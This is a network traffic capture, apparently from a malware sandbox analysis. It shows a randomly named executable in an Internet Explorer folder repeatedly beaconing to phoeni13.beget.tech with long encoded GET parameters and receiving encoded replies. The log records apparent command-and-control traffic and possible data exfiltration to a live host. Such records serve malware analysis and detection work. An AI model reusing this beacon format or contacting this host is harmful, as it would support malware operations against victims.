Jan 5, 2025 18:57:29.807755947 CET	2903	OUT	GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=d1nIiojI3MmM2cDZ3ETNhdjNzYTZiFmM0MjYhF2M4cjN1EGZlBjIsISZmFzY2gTMyQGZwcTYmBTMjBjMhVTN2M2MwQGMkBTZxYWO3ImYjJWZiojIyYGOkZDO1QDMiNjZ2IDZ4QjNlVWYiZTN1gTMhZ2MlhjIsISYiVmYjRmZxITMwQTZjZGO4cDOhVWO5UzMjZGO2UDM5IzMhVTO4MGMiojIwYjMyYzNhVzY5UjMmdDM4YTZ3gjMmFTOwcjZ2YjZ3MmI7xSfiADWmlWQq1kNjpXT2kEVNl2bqlUbapnTzEFRPxmRU50MVpXTy0kMNVTVUpVaS1WW4FlaORTUy4ENFJjTrZUbZhmSXlFbadkW6l0QMlWVD1keJl2TptGRNhXWU9UaKRVTrZUbONzYq1EerRkT4FFRO [TRUNCATED] Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: phoeni13.beget.tech Connection: Keep-Alive
Jan 5, 2025 18:57:30.567229033 CET	350	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Sun, 05 Jan 2025 17:57:30 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Keep-Alive: timeout=30 Vary: Accept-Encoding X-Powered-By: PHP/8.2.22 Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4e 6b 6c 44 4d 7a 49 6d 4d 79 51 7a 4d 32 49 6d 5a 33 59 54 5a 34 55 47 4d 32 59 44 4e 33 55 54 4f 6d 5a 44 4e 34 55 44 4d 32 49 79 65 36 49 69 59 32 59 32 59 33 55 32 4e 6c 4a 32 59 30 49 47 4f 30 51 6d 5a 34 51 6a 4d 6c 42 44 4f 32 55 47 4e 33 59 44 4f 79 51 6a 4e 69 4a 79 65 Data Ascii: ==Qf9JiI6ICNklDMzImMyQzM2ImZ3YTZ4UGM2YDN3UTOmZDN4UDM2Iye6IiY2Y2Y3U2NlJ2Y0IGO0QmZ4QjMlBDO2UGN3YDOyQjNiJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49748	5.101.152.15	80	7744	C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 5, 2025 18:57:35.588427067 CET	2903	OUT	GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=d1nIiojI3MmM2cDZ3ETNhdjNzYTZiFmM0MjYhF2M4cjN1EGZlBjIsISZmFzY2gTMyQGZwcTYmBTMjBjMhVTN2M2MwQGMkBTZxYWO3ImYjJWZiojIyYGOkZDO1QDMiNjZ2IDZ4QjNlVWYiZTN1gTMhZ2MlhjIsISYiVmYjRmZxITMwQTZjZGO4cDOhVWO5UzMjZGO2UDM5IzMhVTO4MGMiojIwYjMyYzNhVzY5UjMmdDM4YTZ3gjMmFTOwcjZ2YjZ3MmI7xSfiADWml2YE5kNjpXT2cGVNl2bqlUbapnTzEFRPxmRU50MVpXTy0kMNVTVUpVaS1WW4FlaORTUy4ENFJjTrZUbZhmSXlFbadkW6l0QMlWVD1keJl2TptGRNhXWU9UaKRVTrZUbONzYq1EerRkT4FFRO [TRUNCATED] Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: phoeni13.beget.tech Connection: Keep-Alive
Jan 5, 2025 18:57:36.346798897 CET	350	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Sun, 05 Jan 2025 17:57:36 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Keep-Alive: timeout=30 Vary: Accept-Encoding X-Powered-By: PHP/8.2.22 Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4e 6b 6c 44 4d 7a 49 6d 4d 79 51 7a 4d 32 49 6d 5a 33 59 54 5a 34 55 47 4d 32 59 44 4e 33 55 54 4f 6d 5a 44 4e 34 55 44 4d 32 49 79 65 36 49 69 59 32 59 32 59 33 55 32 4e 6c 4a 32 59 30 49 47 4f 30 51 6d 5a 34 51 6a 4d 6c 42 44 4f 32 55 47 4e 33 59 44 4f 79 51 6a 4e 69 4a 79 65 Data Ascii: ==Qf9JiI6ICNklDMzImMyQzM2ImZ3YTZ4UGM2YDN3UTOmZDN4UDM2Iye6IiY2Y2Y3U2NlJ2Y0IGO0QmZ4QjMlBDO2UGN3YDOyQjNiJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49749	5.101.152.15	80	7744	C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 5, 2025 18:57:41.354269028 CET	2903	OUT	GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=d1nIiojI3MmM2cDZ3ETNhdjNzYTZiFmM0MjYhF2M4cjN1EGZlBjIsISZmFzY2gTMyQGZwcTYmBTMjBjMhVTN2M2MwQGMkBTZxYWO3ImYjJWZiojIyYGOkZDO1QDMiNjZ2IDZ4QjNlVWYiZTN1gTMhZ2MlhjIsISYiVmYjRmZxITMwQTZjZGO4cDOhVWO5UzMjZGO2UDM5IzMhVTO4MGMiojIwYjMyYzNhVzY5UjMmdDM4YTZ3gjMmFTOwcjZ2YjZ3MmI7xSfiADWmlWWU5kNjRkT20ERNl2bqlUbapnTzEFRPxmRU50MVpXTy0kMNVTVUpVaS1WW4FlaORTUy4ENFJjTrZUbZhmSXlFbadkW6l0QMlWVD1keJl2TptGRNhXWU9UaKRVTrZUbONzYq1EerRkT4FFRO [TRUNCATED] Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: phoeni13.beget.tech Connection: Keep-Alive
Jan 5, 2025 18:57:42.138269901 CET	350	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Sun, 05 Jan 2025 17:57:41 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Keep-Alive: timeout=30 Vary: Accept-Encoding X-Powered-By: PHP/8.2.22 Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4e 6b 6c 44 4d 7a 49 6d 4d 79 51 7a 4d 32 49 6d 5a 33 59 54 5a 34 55 47 4d 32 59 44 4e 33 55 54 4f 6d 5a 44 4e 34 55 44 4d 32 49 79 65 36 49 69 59 32 59 32 59 33 55 32 4e 6c 4a 32 59 30 49 47 4f 30 51 6d 5a 34 51 6a 4d 6c 42 44 4f 32 55 47 4e 33 59 44 4f 79 51 6a 4e 69 4a 79 65 Data Ascii: ==Qf9JiI6ICNklDMzImMyQzM2ImZ3YTZ4UGM2YDN3UTOmZDN4UDM2Iye6IiY2Y2Y3U2NlJ2Y0IGO0QmZ4QjMlBDO2UGN3YDOyQjNiJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49750	5.101.152.15	80	7744	C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 5, 2025 18:57:47.150926113 CET	2903	OUT	GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=d1nIiojI3MmM2cDZ3ETNhdjNzYTZiFmM0MjYhF2M4cjN1EGZlBjIsISZmFzY2gTMyQGZwcTYmBTMjBjMhVTN2M2MwQGMkBTZxYWO3ImYjJWZiojIyYGOkZDO1QDMiNjZ2IDZ4QjNlVWYiZTN1gTMhZ2MlhjIsISYiVmYjRmZxITMwQTZjZGO4cDOhVWO5UzMjZGO2UDM5IzMhVTO4MGMiojIwYjMyYzNhVzY5UjMmdDM4YTZ3gjMmFTOwcjZ2YjZ3MmI7xSfiADWmlWS61kNBpXT20EVNl2bqlUbapnTzEFRPxmRU50MVpXTy0kMNVTVUpVaS1WW4FlaORTUy4ENFJjTrZUbZhmSXlFbadkW6l0QMlWVD1keJl2TptGRNhXWU9UaKRVTrZUbONzYq1EerRkT4FFRO [TRUNCATED] Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: phoeni13.beget.tech Connection: Keep-Alive
Jan 5, 2025 18:57:47.919193983 CET	350	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Sun, 05 Jan 2025 17:57:47 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Keep-Alive: timeout=30 Vary: Accept-Encoding X-Powered-By: PHP/8.2.22 Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4e 6b 6c 44 4d 7a 49 6d 4d 79 51 7a 4d 32 49 6d 5a 33 59 54 5a 34 55 47 4d 32 59 44 4e 33 55 54 4f 6d 5a 44 4e 34 55 44 4d 32 49 79 65 36 49 69 59 32 59 32 59 33 55 32 4e 6c 4a 32 59 30 49 47 4f 30 51 6d 5a 34 51 6a 4d 6c 42 44 4f 32 55 47 4e 33 59 44 4f 79 51 6a 4e 69 4a 79 65 Data Ascii: ==Qf9JiI6ICNklDMzImMyQzM2ImZ3YTZ4UGM2YDN3UTOmZDN4UDM2Iye6IiY2Y2Y3U2NlJ2Y0IGO0QmZ4QjMlBDO2UGN3YDOyQjNiJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49752	5.101.152.15	80	7744	C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 5, 2025 18:57:52.952296972 CET	2853	OUT	GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=QX9JiI6IyNjJjN3Q2NxUTY3YzM2UmYhJDNzIWYhNDO3YTNhRWZwICLiUmZxMmN4EjMkRGM3EmZwEzYwITY1UjNjNDMkBDZwUWMmlzNiJ2YiVmI6IiMmhDZ2gTN0AjYzYmNyQGO0YTZlFmY2UTN4ETYmNTZ4ICLiEmYlJ2YkZWMyEDM0U2YmhDO3gTYllTO1MzYmhjN1ATOyMTY1kDOjBjI6ICM2IjM2cTY1MWO1IjZ3ADO2U2N4IjZxkDM3YmN2Y2NjJyes0nIwglZptGVOZzYE5kNFRUTp9maJ1mW650MRR0TsZEVONTV61kMNJTT1UFValmUtlFeRpmT0ElMORTRy40aG1WWop0VZxmWHpleJNETpV1QNpXSp9UarRUT4lFVPlmSU10aG1mTzMmaNh3aE5EeRRk [TRUNCATED] Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: phoeni13.beget.tech
Jan 5, 2025 18:57:53.711931944 CET	350	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Sun, 05 Jan 2025 17:57:53 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Keep-Alive: timeout=30 Vary: Accept-Encoding X-Powered-By: PHP/8.2.22 Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4e 6b 6c 44 4d 7a 49 6d 4d 79 51 7a 4d 32 49 6d 5a 33 59 54 5a 34 55 47 4d 32 59 44 4e 33 55 54 4f 6d 5a 44 4e 34 55 44 4d 32 49 79 65 36 49 69 59 32 59 32 59 33 55 32 4e 6c 4a 32 59 30 49 47 4f 30 51 6d 5a 34 51 6a 4d 6c 42 44 4f 32 55 47 4e 33 59 44 4f 79 51 6a 4e 69 4a 79 65 Data Ascii: ==Qf9JiI6ICNklDMzImMyQzM2ImZ3YTZ4UGM2YDN3UTOmZDN4UDM2Iye6IiY2Y2Y3U2NlJ2Y0IGO0QmZ4QjMlBDO2UGN3YDOyQjNiJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49769	5.101.152.15	80	7744	C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 5, 2025 18:57:58.729170084 CET	2903	OUT	GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=d1nIiojI3MmM2cDZ3ETNhdjNzYTZiFmM0MjYhF2M4cjN1EGZlBjIsISZmFzY2gTMyQGZwcTYmBTMjBjMhVTN2M2MwQGMkBTZxYWO3ImYjJWZiojIyYGOkZDO1QDMiNjZ2IDZ4QjNlVWYiZTN1gTMhZ2MlhjIsISYiVmYjRmZxITMwQTZjZGO4cDOhVWO5UzMjZGO2UDM5IzMhVTO4MGMiojIwYjMyYzNhVzY5UjMmdDM4YTZ3gjMmFTOwcjZ2YjZ3MmI7xSfiADWmlWTE1kNVRkT2kFVNl2bqlUbapnTzEFRPxmRU50MVpXTy0kMNVTVUpVaS1WW4FlaORTUy4ENFJjTrZUbZhmSXlFbadkW6l0QMlWVD1keJl2TptGRNhXWU9UaKRVTrZUbONzYq1EerRkT4FFRO [TRUNCATED] Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: phoeni13.beget.tech Connection: Keep-Alive
Jan 5, 2025 18:57:59.487900019 CET	350	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Sun, 05 Jan 2025 17:57:59 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Keep-Alive: timeout=30 Vary: Accept-Encoding X-Powered-By: PHP/8.2.22 Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4e 6b 6c 44 4d 7a 49 6d 4d 79 51 7a 4d 32 49 6d 5a 33 59 54 5a 34 55 47 4d 32 59 44 4e 33 55 54 4f 6d 5a 44 4e 34 55 44 4d 32 49 79 65 36 49 69 59 32 59 32 59 33 55 32 4e 6c 4a 32 59 30 49 47 4f 30 51 6d 5a 34 51 6a 4d 6c 42 44 4f 32 55 47 4e 33 59 44 4f 79 51 6a 4e 69 4a 79 65 Data Ascii: ==Qf9JiI6ICNklDMzImMyQzM2ImZ3YTZ4UGM2YDN3UTOmZDN4UDM2Iye6IiY2Y2Y3U2NlJ2Y0IGO0QmZ4QjMlBDO2UGN3YDOyQjNiJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49810	5.101.152.15	80	7744	C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 5, 2025 18:58:04.494857073 CET	2879	OUT	GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=d1nIiojI3MmM2cDZ3ETNhdjNzYTZiFmM0MjYhF2M4cjN1EGZlBjIsISZmFzY2gTMyQGZwcTYmBTMjBjMhVTN2M2MwQGMkBTZxYWO3ImYjJWZiojIyYGOkZDO1QDMiNjZ2IDZ4QjNlVWYiZTN1gTMhZ2MlhjIsISYiVmYjRmZxITMwQTZjZGO4cDOhVWO5UzMjZGO2UDM5IzMhVTO4MGMiojIwYjMyYzNhVzY5UjMmdDM4YTZ3gjMmFTOwcjZ2YjZ3MmI7xSfiADWmlWTE5kNVRUT2sGRNl2bqlUbapnTzEFRPxmRU50MVpXTy0kMNVTVUpVaS1WW4FlaORTUy4ENFJjTrZUbZhmSXlFbadkW6l0QMlWVD1keJl2TptGRNhXWU9UaKRVTrZUbONzYq1EerRkT4FFRO [TRUNCATED] Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: phoeni13.beget.tech
Jan 5, 2025 18:58:05.231141090 CET	350	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Sun, 05 Jan 2025 17:58:05 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Keep-Alive: timeout=30 Vary: Accept-Encoding X-Powered-By: PHP/8.2.22 Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4e 6b 6c 44 4d 7a 49 6d 4d 79 51 7a 4d 32 49 6d 5a 33 59 54 5a 34 55 47 4d 32 59 44 4e 33 55 54 4f 6d 5a 44 4e 34 55 44 4d 32 49 79 65 36 49 69 59 32 59 32 59 33 55 32 4e 6c 4a 32 59 30 49 47 4f 30 51 6d 5a 34 51 6a 4d 6c 42 44 4f 32 55 47 4e 33 59 44 4f 79 51 6a 4e 69 4a 79 65 Data Ascii: ==Qf9JiI6ICNklDMzImMyQzM2ImZ3YTZ4UGM2YDN3UTOmZDN4UDM2Iye6IiY2Y2Y3U2NlJ2Y0IGO0QmZ4QjMlBDO2UGN3YDOyQjNiJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49844	5.101.152.15	80	7744	C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 5, 2025 18:58:10.255088091 CET	2879	OUT	GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=d1nIiojI3MmM2cDZ3ETNhdjNzYTZiFmM0MjYhF2M4cjN1EGZlBjIsISZmFzY2gTMyQGZwcTYmBTMjBjMhVTN2M2MwQGMkBTZxYWO3ImYjJWZiojIyYGOkZDO1QDMiNjZ2IDZ4QjNlVWYiZTN1gTMhZ2MlhjIsISYiVmYjRmZxITMwQTZjZGO4cDOhVWO5UzMjZGO2UDM5IzMhVTO4MGMiojIwYjMyYzNhVzY5UjMmdDM4YTZ3gjMmFTOwcjZ2YjZ3MmI7xSfiADWmlWV61kNNRlT2EEVNl2bqlUbapnTzEFRPxmRU50MVpXTy0kMNVTVUpVaS1WW4FlaORTUy4ENFJjTrZUbZhmSXlFbadkW6l0QMlWVD1keJl2TptGRNhXWU9UaKRVTrZUbONzYq1EerRkT4FFRO [TRUNCATED] Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: phoeni13.beget.tech
Jan 5, 2025 18:58:11.140255928 CET	350	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Sun, 05 Jan 2025 17:58:11 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Keep-Alive: timeout=30 Vary: Accept-Encoding X-Powered-By: PHP/8.2.22 Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4e 6b 6c 44 4d 7a 49 6d 4d 79 51 7a 4d 32 49 6d 5a 33 59 54 5a 34 55 47 4d 32 59 44 4e 33 55 54 4f 6d 5a 44 4e 34 55 44 4d 32 49 79 65 36 49 69 59 32 59 32 59 33 55 32 4e 6c 4a 32 59 30 49 47 4f 30 51 6d 5a 34 51 6a 4d 6c 42 44 4f 32 55 47 4e 33 59 44 4f 79 51 6a 4e 69 4a 79 65 Data Ascii: ==Qf9JiI6ICNklDMzImMyQzM2ImZ3YTZ4UGM2YDN3UTOmZDN4UDM2Iye6IiY2Y2Y3U2NlJ2Y0IGO0QmZ4QjMlBDO2UGN3YDOyQjNiJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49878	5.101.152.15	80	7744	C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 5, 2025 18:58:16.150679111 CET	2905	OUT	GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=QX9JiI6IyNjJjN3Q2NxUTY3YzM2UmYhJDNzIWYhNDO3YTNhRWZwICLiUmZxMmN4EjMkRGM3EmZwEzYwITY1UjNjNDMkBDZwUWMmlzNiJ2YiVmI6IiMmhDZ2gTN0AjYzYmNyQGO0YTZlFmY2UTN4ETYmNTZ4ICLiEmYlJ2YkZWMyEDM0U2YmhDO3gTYllTO1MzYmhjN1ATOyMTY1kDOjBjI6ICM2IjM2cTY1MWO1IjZ